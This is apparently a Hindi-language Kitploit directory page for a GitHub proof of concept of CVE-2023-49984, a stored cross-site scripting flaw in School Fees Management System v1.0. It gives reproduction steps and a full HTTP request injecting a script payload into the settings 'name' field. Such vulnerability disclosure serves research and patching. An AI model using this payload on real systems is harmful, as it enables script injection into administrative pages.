Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-49984 — स्कूल फीस प्रबंधन प्रणाली v1.0 - क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी में 'name' फील्ड/पैरामीटर पर '/management/settings' | Kitploit
उपकरण/GitHubGitHub/geraldoalcantara/cve-2023-49984
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubgeraldoalcantara/cve-2023-49984

CVE-2023-49984

स्कूल फीस प्रबंधन प्रणाली v1.0 - क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी में 'name' फील्ड/पैरामीटर पर '/management/settings'

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-49984

स्कूल फीस प्रबंधन प्रणाली v1.0 - "/management/settings" पर "name" फ़ील्ड/पैरामीटर में क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी

विवरण: School Fees Management System v1.0 के "/management/settings" घटक में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी हमलावरों को name पैरामीटर में इंजेक्ट किए गए एक क्राफ्टेड पेलोड के माध्यम से मनमाना वेब स्क्रिप्ट या HTML निष्पादित करने की अनुमति देती है।

कमजोर उत्पाद संस्करण: School Fees Management System v1.0
CVE लेखक: Geraldo Alcântara
तिथि: 28/11/2023
पुष्टि की तिथि: 19/12/2023
CVE: CVE-2023-49984
परीक्षण किया गया: Windows

पुनरुत्पादन के चरण:

कमजोरी का शोषण करने के लिए, उपयुक्त अनुमतियों वाले उपयोगकर्ता को "/ci_fms/admin/management/settings" पृष्ठ तक पहुँचना होगा। इस पृष्ठ पर, उपयोगकर्ता को सामान्य सेटिंग्स में फ़ील्ड्स को संपादित करना चाहिए। दुर्भावनापूर्ण पेलोड को "name" या "phone" या "address" या "bank" या "acc_name" या "acc_number" में डाला जाना चाहिए।

Resquest:

root@kitploit:~
POST /ci_fms/admin/action/main_settings HTTP/1.1
Host: 192.168.68.148
Content-Length: 209
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/management/settings
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=qvpbijnrhr1a3stolsuvdglpo8a7mb3h
Connection: close

name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&phone=09123456987&address=14+Street%2C+There+City%2C+Anywhere%2C+2306&bank=ABC+Bank&acc_name=Our+Best+School&acc_number=123456789874&session=2022-2023

खोजकर्ता/श्रेय:
Geraldo Alcântara

टूल डाउनलोड करें